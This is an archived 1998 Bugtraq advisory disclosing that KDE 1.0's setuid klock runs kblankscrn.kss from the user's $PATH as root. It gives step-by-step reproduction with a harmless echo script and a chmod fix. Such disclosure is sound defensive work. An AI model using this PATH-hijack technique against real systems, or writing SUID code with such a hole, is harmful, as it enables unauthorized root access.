[8573] in bugtraq
KDE 1.0's klock can be used to gain root priveledges
daemon@ATHENA.MIT.EDU (HD Moore)
Mon Nov 16 22:20:37 1998
Date: Mon, 16 Nov 1998 19:57:51 -0600
Reply-To: HD Moore <hdmoore@USA.NET>
From: HD Moore <hdmoore@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --( the problem )--
The SUID program klock shipped with KDE 1.0 attempts to execute
kblankscrn.kss in the same directory as it. If kblankscrn.kss cannot
be executed (missing or mode -x) then klock will search the current
user's $PATH for any executable with the same name and execute it as
ROOT. If no executable is found in the current path it gives this
message:
>Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin
Default modes for klock and kblankscrn.kss are:
- -rwsr-xr-x 1 root root 8760 Mar 12 1998 /opt/kde/bin/klock
- -rwsr-xr-x 1 root root 43600 Mar 12 1998
/opt/kde/bin/kblankscrn.kss
Systems Affected: any system that runs KDE 1.0
____________________________________________________
( the exploit )
This is only exploitable if any of the following occurs:
1) klock is moved to another directory
2) kblankscrn.kss is moved to another directory
3) kblankscrn.kss is not executable
To see if you are vulnerable...
1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss
2) login as a normal user
3) create a shell script thats looks like:
#!/bin/sh
echo Running script as `whoami`!
exit
4) name this script to kblankscrn.kss and mv to your home directory.
5) execute /opt/kde/bin/klock, you should see:
user@hostname:/home/user> /opt/kde/bin/klock
user@hostname:/home/user> Running script as root!
6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss
____________________________________________________
- --( the fix )--
chmod 700 /opt/kde/bin/klock or wait until KDE is updated.
the KDE buglist has been notified
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQA/AwUBNlDXoa51X44hunVSEQJl2wCgzFbX8KdOfCfOMZGREF5e9H2BGA8An3Qw
UmLBRO0nACQcXreodKkWFrpm
=rKnX
-----END PGP SIGNATURE-----
